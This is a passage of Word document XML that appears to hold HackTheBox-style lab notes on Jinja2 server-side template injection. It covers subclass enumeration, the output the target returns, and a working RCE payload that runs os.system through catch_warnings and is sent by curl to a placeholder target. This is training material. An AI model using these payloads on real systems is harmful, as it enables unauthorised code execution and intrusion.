&amp;#39;_pickle.Pickler&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_pickle.Pdata&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_pickle.PicklerMemoProxy&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_pickle.UnpicklerMemoProxy&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;pickle._Framer&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;pickle._Unframer&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;pickle._Pickler&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;pickle._Unpickler&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.bccache.Bucket&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.bccache.BytecodeCache&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.utils.MissingType&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.utils.LRUCache&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.utils.Cycler&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.utils.Joiner&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.utils.Namespace&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.nodes.EvalContext&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.nodes.Node&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.visitor.NodeVisitor&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.idtracking.Symbols&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.compiler.MacroRef&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.compiler.Frame&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.runtime.TemplateReference&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.runtime.Context&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.runtime.BlockReference&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.runtime.LoopContext&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.runtime.Macro&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.runtime.Undefined&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;ast.NodeVisitor&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.lexer.Failure&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.lexer.TokenStreamIterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.lexer.TokenStream&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.lexer.Lexer&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.parser.Parser&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.environment.Environment&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.environment.Template&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.environment.TemplateModule&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.environment.TemplateExpression&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.environment.TemplateStream&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;jinja2.loaders.BaseLoader&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.local.Local&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.local.LocalStack&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.local.LocalManager&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.local._ProxyLookup&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.local.LocalProxy&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;difflib.SequenceMatcher&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;difflib.Differ&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;difflib.HtmlDiff&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;pprint._safe_key&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;pprint.PrettyPrinter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.routing.RuleFactory&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.routing.RuleTemplate&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.routing.BaseConverter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.routing.Map&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.routing.MapAdapter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;gettext.NullTranslations&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;click._compat._FixupStream&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;click._compat._AtomicFile&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;click.utils.LazyFile&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;click.utils.KeepOpenFile&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;click.utils.PacifyFlushWrapper&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;click.types.ParamType&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;click.parser.Option&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;click.parser.Argument&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;click.parser.ParsingState&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;click.parser.OptionParser&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;click.formatting.HelpFormatter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;click.core.Context&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;click.core.BaseCommand&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;click.core.Parameter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;flask.signals.Namespace&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;flask.signals._FakeSignal&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;flask.cli.DispatchingApp&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;flask.cli.ScriptInfo&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;flask.config.ConfigAttribute&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;flask.ctx._AppCtxGlobals&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;flask.ctx.AppContext&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;flask.ctx.RequestContext&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;flask.scaffold.Scaffold&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itsdangerous._json._CompactJSON&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itsdangerous.signer.SigningAlgorithm&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itsdangerous.signer.Signer&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itsdangerous.serializer.Serializer&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;flask.json.tag.JSONTag&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;flask.json.tag.TaggedJSONSerializer&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;flask.sessions.SessionInterface&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;flask.blueprints.BlueprintSetupState&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;unicodedata.UCD&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;__future__._Feature&amp;#39;&amp;gt;]&lt;/a&gt;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&lt;input type="submit" value="execute"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="4FB45705" wp14:textId="58CF5929">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Let us print out the number and the method names using the following payload.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="5BB9D3D5" wp14:textId="3142EA66">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4F301ED8" wp14:textId="778D3DC8">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 xml:space="preserve">{% for i in range(450) %} </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>{{ i }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">{{ ''.__class__.__mro__[1].__subclasses__()[i].__name__ }} </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>{% endfor %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="7A1310DE" wp14:textId="308798E8">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Curl - Interacting with the Target </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="4D66B64E" wp14:textId="46B599E2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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yovecio@htb[/htb]$ curl -gs "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:&lt;PORT&gt;/execute?cmd=%7B%25%20for%20i%20in%20range%28450%29%20%25%7D%20%7B%7B%20i%20%7D%7D%20%7B%7B%20%27%27.__class__.__mro__%5B1%5D.__subclasses__%28%29%5Bi%5D.__name__%20%7D%7D%20%7B%25%20endfor%20%25%7D"</w:t>
      </w:r>
      <w:r>
        <w:br/>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r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;div id="desktop"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;div class="window" data-title="Run"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;form action="/execute" method="get"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;a&gt;C:\&gt;&lt;input type="text" name="cmd" id="command"&gt;&lt;/a&gt;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&lt;a&gt; 0 type  1 weakref  2 weakcallableproxy  3 weakproxy  4 int  5 bytearray  6 bytes  7 list  8 NoneType  9 NotImplementedType  10 traceback  11 super  12 range  13 dict  14 dict_keys  15 dict_values  16 dict_items  17 dict_reversekeyiterator  18 dict_reversevalueiterator  19 dict_reverseitemiterator  20 odict_iterator  21 set  22 str  23 slice  24 staticmethod  25 complex  26 float  27 frozenset  28 property  29 managedbuffer  30 memoryview  31 tuple  32 enumerate  33 reversed  34 stderrprinter  35 code  36 frame  37 builtin_function_or_method  38 method  39 function  40 mappingproxy  41 generator  42 getset_descriptor  43 wrapper_descriptor  44 method-wrapper  45 ellipsis  46 member_descriptor  47 SimpleNamespace  48 PyCapsule  49 longrange_iterator  50 cell  51 instancemethod  52 classmethod_descriptor  53 method_descriptor  54 callable_iterator  55 iterator  56 PickleBuffer  57 coroutine  58 coroutine_wrapper  59 InterpreterID  60 EncodingMap  61 fieldnameiterator  62 formatteriterator  63 BaseException  64 hamt  65 hamt_array_node  66 hamt_bitmap_node  67 hamt_collision_node  68 keys  69 values  70 items  71 Context  72 ContextVar  73 Token  74 MISSING  75 moduledef  76 module  77 filter  78 map  79 zip  80 _ModuleLock  81 _DummyModuleLock  82 _ModuleLockManager  83 ModuleSpec  84 BuiltinImporter  85 classmethod  86 FrozenImporter  87 _ImportLockContext  88 _localdummy  89 _local  90 lock  91 RLock  92 _IOBase  93 _BytesIOBuffer  94 IncrementalNewlineDecoder  95 ScandirIterator  96 DirEntry  97 WindowsRegistryFinder  98 _LoaderBasics  99 FileLoader  100 _NamespacePath  101 _NamespaceLoader  102 PathFinder  103 FileFinder  104 zipimporter  105 _ZipImportResourceReader  106 Codec  107 IncrementalEncoder  108 IncrementalDecoder  109 StreamReaderWriter  110 StreamRecoder  111 _abc_data  112 ABC  113 dict_itemiterator  114 Hashable  115 Awaitable  116 AsyncIterable  117 async_generator  118 Iterable  119 bytes_iterator  120 bytearray_iterator  121 dict_keyiterator  122 dict_valueiterator  123 list_iterator  124 list_reverseiterator  125 range_iterator  126 set_iterator  127 str_iterator  128 tuple_iterator  129 Sized  130 Container  131 Callable  132 _wrap_close  133 Quitter  134 _Printer  135 _Helper  136 itemgetter  137 attrgetter  138 methodcaller  139 accumulate  140 combinations  141 combinations_with_replacement  142 cycle  143 dropwhile  144 takewhile  145 islice  146 starmap  147 chain  148 compress  149 filterfalse  150 count  151 zip_longest  152 permutations  153 product  154 repeat  155 groupby  156 _grouper  157 _tee  158 _tee_dataobject  159 Repr  160 deque  161 _deque_iterator  162 _deque_reverse_iterator  163 _tuplegetter  164 _Link  165 partial  166 _lru_cache_wrapper  167 partialmethod  168 singledispatchmethod  169 cached_property  170 DynamicClassAttribute  171 _GeneratorWrapper  172 auto  173 Enum  174 Pattern  175 Match  176 SRE_Scanner  177 State  178 SubPattern  179 Tokenizer  180 Scanner  181 Template  182 Formatter  183 ContextDecorator  184 _GeneratorContextManagerBase  185 _BaseExitStack  186 _Final  187 _Immutable  188 Generic  189 _TypingEmpty  190 _TypingEllipsis  191 NamedTuple  192 typing.io  193 typing.re  194 AST  195 _MarkupEscapeHelper  196 poll  197 epoll  198 BaseSelector  199 socket  200 _IterationGuard  201 WeakSet  202 _RLock  203 Condition  204 Semaphore  205 Event  206 Barrier  207 Thread  208 BaseServer  209 ForkingMixIn  210 _NoThreads  211 ThreadingMixIn  212 BaseRequestHandler  213 WarningMessage  214 catch_warnings  215 date  216 timedelta  217 time  218 tzinfo  219 _Info  220 finalize  221 sha384  222 sha512  223 Random  224 _ResultMixinStr  225 _ResultMixinBytes  226 _NetlocResultMixinBase  227 _localized_month  228 _localized_day  229 Calendar  230 different_locale  231 AddrlistClass  232 Struct  233 unpack_iterator  234 Charset  235 Header  236 _ValueFormatter  237 _PolicyBase  238 BufferedSubFile  239 FeedParser  240 Parser  241 BytesParser  242 Message  243 HTTPConnection  244 _SSLContext  245 _SSLSocket  246 MemoryBIO  247 Session  248 SSLObject  249 MimeTypes  250 Compress  251 Decompress  252 BZ2Compressor  253 BZ2Decompressor  254 LZMACompressor  255 LZMADecompressor  256 Bytecode  257 Untokenizer  258 BlockFinder  259 _void  260 _empty  261 Parameter  262 BoundArguments  263 Signature  264 FrameSummary  265 TracebackException  266 LogRecord  267 PercentStyle  268 Formatter  269 BufferingFormatter  270 Filter  271 Filterer  272 PlaceHolder  273 Manager  274 LoggerAdapter  275 _Missing  276 Aborter  277 Href  278 CompletedProcess  279 Popen  280 HASH  281 blake2b  282 blake2s  283 sha3_224  284 sha3_256  285 sha3_384  286 sha3_512  287 shake_128  288 shake_256  289 _RandomNameSequence  290 _TemporaryFileCloser  291 _TemporaryFileWrapper  292 SpooledTemporaryFile  293 TemporaryDirectory  294 Request  295 OpenerDirector  296 BaseHandler  297 HTTPPasswordMgr  298 AbstractBasicAuthHandler  299 AbstractDigestAuthHandler  300 URLopener  301 ftpwrapper  302 Cookie  303 CookiePolicy  304 Absent  305 CookieJar  306 ImmutableListMixin  307 ImmutableDictMixin  308 _omd_bucket  309 Headers  310 ImmutableHeadersMixin  311 IfRange  312 Range  313 ContentRange  314 FileStorage  315 _HAS_DEFAULT_FACTORY_CLASS  316 _MISSING_TYPE  317 _FIELD_BASE  318 InitVar  319 Field  320 _DataclassParams  321 Event  322 MultipartDecoder  323 MultipartEncoder  324 Finder  325 Loader  326 ResourceReader  327 ImpImporter  328 ImpLoader  329 HMAC  330 ClosingIterator  331 FileWrapper  332 _RangeWrapper  333 HTMLBuilder  334 AcceptMixin  335 AuthorizationMixin  336 WWWAuthenticateMixin  337 Scanner  338 Encoder  339 JSONDecoder  340 JSONEncoder  341 FormDataParser  342 MultiPartParser  343 UserAgent  344 _UserAgentParser  345 Request  346 StreamOnlyMixin  347 Response  348 ResponseStream  349 ResponseStreamMixin  350 CommonRequestDescriptorsMixin  351 CommonResponseDescriptorsMixin  352 ETagRequestMixin  353 ETagResponseMixin  354 UserAgentMixin  355 _TestCookieHeaders  356 _TestCookieResponse  357 EnvironBuilder  358 Client  359 Decimal  360 Context  361 SignalDictMixin  362 ContextManager  363 Number  364 UUID  365 Unpickler  366 Pickler  367 Pdata  368 PicklerMemoProxy  369 UnpicklerMemoProxy  370 _Framer  371 _Unframer  372 _Pickler  373 _Unpickler  374 Bucket  375 BytecodeCache  376 MissingType  377 LRUCache  378 Cycler  379 Joiner  380 Namespace  381 EvalContext  382 Node  383 NodeVisitor  384 Symbols  385 MacroRef  386 Frame  387 TemplateReference  388 Context  389 BlockReference  390 LoopContext  391 Macro  392 Undefined  393 NodeVisitor  394 Failure  395 TokenStreamIterator  396 TokenStream  397 Lexer  398 Parser  399 Environment  400 Template  401 TemplateModule  402 TemplateExpression  403 TemplateStream  404 BaseLoader  405 Local  406 LocalStack  407 LocalManager  408 _ProxyLookup  409 LocalProxy  410 SequenceMatcher  411 Differ  412 HtmlDiff  413 _safe_key  414 PrettyPrinter  415 RuleFactory  416 RuleTemplate  417 BaseConverter  418 Map  419 MapAdapter  420 NullTranslations  421 _FixupStream  422 _AtomicFile  423 LazyFile  424 KeepOpenFile  425 PacifyFlushWrapper  426 ParamType  427 Option  428 Argument  429 ParsingState  430 OptionParser  431 HelpFormatter  432 Context  433 BaseCommand  434 Parameter  435 Namespace  436 _FakeSignal  437 DispatchingApp  438 ScriptInfo  439 ConfigAttribute  440 _AppCtxGlobals  441 AppContext  442 RequestContext  443 Scaffold  444 _CompactJSON  445 SigningAlgorithm  446 Signer  447 Serializer  448 JSONTag  449 TaggedJSONSerializer &lt;/a&gt;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&lt;input type="submit" value="execute"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="032A2741" wp14:textId="14EADC25">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>As you can see in the application's response, catch_warnings is located at index #214.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="1C98A914" wp14:textId="6E9822BF">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>We have everything we need to construct an RCE payload, such as the following.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="3F76C674" wp14:textId="021F42CC">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3FE93ADF" wp14:textId="64DE9D35">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{{''.__class__.__mro__[1].__subclasses__()[214]()._module.__builtins__['__import__']('os').system("touch /tmp/test1") }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="2488DE79" wp14:textId="451288FA">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Curl - Interacting with the Target </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="4ADBDE02" wp14:textId="402CB727">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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yovecio@htb[/htb]$ curl -gs "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:&lt;PORT&gt;/execute?cmd=%7B%7B%27%27.__class__.__mro__%5B1%5D.__subclasses__%28%29%5B214%5D%28%29._module.__builtins__%5B%27__import__%27%5D%28%27os%27%29.system%28%22touch%20%2Ftmp%2Ftest1%22%29%20%7D%7D"</w:t>
      </w:r>
      <w:r>
        <w:br/>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r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;div id="desktop"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;div class="window" data-title="Run"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
